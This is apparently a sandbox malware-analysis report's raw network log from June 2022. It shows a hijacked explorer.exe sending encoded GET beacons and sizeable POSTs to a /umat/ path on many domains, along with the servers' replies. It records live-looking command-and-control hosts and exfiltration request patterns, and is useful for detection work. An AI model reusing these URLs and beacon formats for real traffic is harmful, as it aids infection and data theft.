                                                                                                          Jun 3, 2022 08:19:18.218009949 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218030930 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218051910 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218074083 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218094110 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218115091 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218170881 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218194008 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.219019890 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260520935 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260586023 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260644913 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260694981 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260750055 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260754108 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.260791063 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260831118 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260857105 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.260868073 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260979891 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.261002064 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.261029005 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581618071 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581721067 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581734896 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581794024 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581804037 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581851959 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581891060 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581937075 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581964016 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582015038 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.582031965 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582086086 CEST4988980192.168.2.423.227.38.74
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49780 | 185.254.241.173 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:16:58.893158913 CEST | 7704 | OUT | GET /umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.sinsegae.net
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
Jun 3, 2022 08:16:59.184253931 CEST | 7705 | IN | HTTP/1.1 404 Not Found
                                                                                                          Content-Type: text/html
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Date: Fri, 03 Jun 2022 06:16:59 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 1259
                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ks_c_5601-1987"/><title>404 - .</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had
Jun 3, 2022 08:16:59.184284925 CEST | 7705 | IN |
                                                                                                          Data Ascii: its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49783 | 162.213.255.237 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:09.624197006 CEST | 9575 | OUT | GET /umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.shopcycles3.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
Jun 3, 2022 08:17:09.869417906 CEST | 9576 | IN | HTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:09 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Content-Length: 281
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.shopcycles3.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49825 | 198.44.241.20 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:49.230521917 CEST | 10620 | OUT | GET /umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.huiyi-sui.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
Jun 3, 2022 08:17:49.438215017 CEST | 10666 | IN | HTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 1841
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49835 | 107.187.232.173 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:55.044303894 CEST | 11048 | OUT | POST /umat/ HTTP/1.1
                                                                                                          Host: www.sarrafguler.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.sarrafguler.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.sarrafguler.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49836 | 107.187.232.173 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:55.225189924 CEST | 11057 | OUT | POST /umat/ HTTP/1.1
                                                                                                          Host: www.sarrafguler.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.sarrafguler.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.sarrafguler.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.4 | 49837 | 107.187.232.173 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:55.392704964 CEST | 11057 | OUT | GET /umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.sarrafguler.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
Jun 3, 2022 08:17:55.561633110 CEST | 11079 | IN | HTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 785
                                                                                                          Connection: close
                                                                                                          Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.4 | 49888 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:19:18.163798094 CEST | 11193 | OUT | POST /umat/ HTTP/1.1
                                                                                                          Host: www.theflysnare.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.theflysnare.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.theflysnare.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.4 | 49889 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:19:18.184734106 CEST | 11206 | OUT | POST /umat/ HTTP/1.1
                                                                                                          Host: www.theflysnare.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.theflysnare.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.theflysnare.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
Jun 3, 2022 08:19:18.581618071 CEST | 11239 | IN | HTTP/1.1 402 Payment Required
                                                                                                          Date: Fri, 03 Jun 2022 06:19:18 GMT
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          X-Sorting-Hat-PodId: 228
                                                                                                          X-Sorting-Hat-ShopId: 64312672485
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-ShopId: 64312672485
                                                                                                          X-ShardId: 228
                                                                                                          Vary: Accept
                                                                                                          X-Shopify-Stage: production
                                                                                                          Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8ce6b02f-253b-4e63-a29a-f49a2a4ce062
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-Download-Options: noopen
                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                          X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8ce6b02f-253b-4e63-a29a-f49a2a4ce062
                                                                                                          X-Dc: gcp-europe-west1,gcp-us-east1,gcp-us-east1
                                                                                                          X-Request-ID: 8ce6b02f-253b-4e63-a29a-f49a2a4ce062
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 715650febf2091f9-FRA
                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                          Data Ascii: 2bb9<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css">


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.4 | 49890 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:19:18.202693939 CEST | 11230 | OUT | GET /umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.theflysnare.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
Jun 3, 2022 08:19:18.260586023 CEST | 11233 | IN | HTTP/1.1 403 Forbidden
                                                                                                          Date: Fri, 03 Jun 2022 06:19:18 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Sorting-Hat-PodId: 228
                                                                                                          X-Sorting-Hat-ShopId: 64312672485
                                                                                                          X-Dc: gcp-europe-west1
                                                                                                          X-Request-ID: 7cd6fc28-a7e1-4039-9e7f-7134e5189789
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          X-Download-Options: noopen
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 715650fedfd39bfb-FRA
                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                                                          Jun 3, 2022 08:19:18.260644913 CEST11234INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                          Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                                                          Jun 3, 2022 08:19:18.260694981 CEST11235INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                          Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                                                          Jun 3, 2022 08:19:18.260750055 CEST11237INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                          Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                                                          Jun 3, 2022 08:19:18.260791063 CEST11237INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                          Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                                                          Jun 3, 2022 08:19:18.260831118 CEST11237INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.4 | 49891 | 154.36.145.110 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:19:23.618773937 CEST | 11252 | OUT | POST /umat/ HTTP/1.1
Host: www.huayugw.com
Connection: close
Content-Length: 414
Cache-Control: no-cache
Origin: http://www.huayugw.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.huayugw.com/umat/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.4 | 49892 | 154.36.145.110 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:19:23.795093060 CEST | 11260 | OUT | POST /umat/ HTTP/1.1
Host: www.huayugw.com
Connection: close
Content-Length: 36482
Cache-Control: no-cache
Origin: http://www.huayugw.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.huayugw.com/umat/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.4 | 49893 | 154.36.145.110 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:19:23.968199015 CEST | 11261 | OUT | GET /umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrp HTTP/1.1
Host: www.huayugw.com
Connection: close
Jun 3, 2022 08:19:24.144052982 CEST | 11291 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Jun 2022 06:19:34 GMT
Content-Type: text/html
Content-Length: 1796
Connection: close
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49784 | 18.193.36.153 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:26.897332907 CEST | 9578 | OUT | POST /umat/ HTTP/1.1
Host: www.drivetrianrepair.com
Connection: close
Content-Length: 414
Cache-Control: no-cache
Origin: http://www.drivetrianrepair.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.drivetrianrepair.com/umat/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Jun 3, 2022 08:17:26.916953087 CEST | 9578 | IN | HTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          D-Geo: EU
                                                                                                          Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49785 | 18.193.36.153 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:26.921689034 CEST | 9592 | OUT | POST /umat/ HTTP/1.1
                                                                                                          Host: www.drivetrianrepair.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.drivetrianrepair.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.drivetrianrepair.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
Jun 3, 2022 08:17:26.941128969 CEST | 9616 | IN | HTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          D-Geo: EU
                                                                                                          Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49786 | 18.193.36.153 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:26.941837072 CEST | 9617 | OUT | GET /umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.drivetrianrepair.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
Jun 3, 2022 08:17:26.960726976 CEST | 9618 | IN | HTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 174
                                                                                                          Connection: close
                                                                                                          D-Geo: EU
                                                                                                          Data Ascii: <html><head><title>Not supported</title></head><body><center><h1>Your browser version is no longer supported. Please upgrade to the latest version</h1></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49789 | 66.96.162.130 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:37.238796949 CEST | 9667 | OUT | POST /umat/ HTTP/1.1
                                                                                                          Host: www.408wmountain.info
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.408wmountain.info
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.408wmountain.info/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
Jun 3, 2022 08:17:37.378067970 CEST | 9718 | IN | HTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 867
                                                                                                          Connection: close
                                                                                                          Server: Apache/2
                                                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Age: 0
                                                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49790 | 66.96.162.130 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 3, 2022 08:17:37.338881969 CEST | 9717 | OUT | POST /umat/ HTTP/1.1
                                                                                                          Host: www.408wmountain.info
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.408wmountain.info
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.408wmountain.info/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Jun 3, 2022 08:17:37.436929941 CEST   9727                 OUT
                                                                                                          Jun 3, 2022 08:17:37.436988115 CEST   9742                 OUT
                                                                                                          Jun 3, 2022 08:17:37.550848007 CEST   9745                 IN          HTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 867
                                                                                                          Connection: close
                                                                                                          Server: Apache/2
                                                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Age: 0
                                                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port   Process
                                                                                                          7            192.168.2.4   49791         66.96.162.130    80                 C:\Windows\explorer.exe
                                                                                                          Timestamp                             kBytes transferred   Direction   Data
                                                                                                          Jun 3, 2022 08:17:37.438126087 CEST   9743                 OUT         GET /umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.408wmountain.info
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:17:37.549096107 CEST   9744                 IN          HTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 867
                                                                                                          Connection: close
                                                                                                          Server: Apache/2
                                                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Age: 0
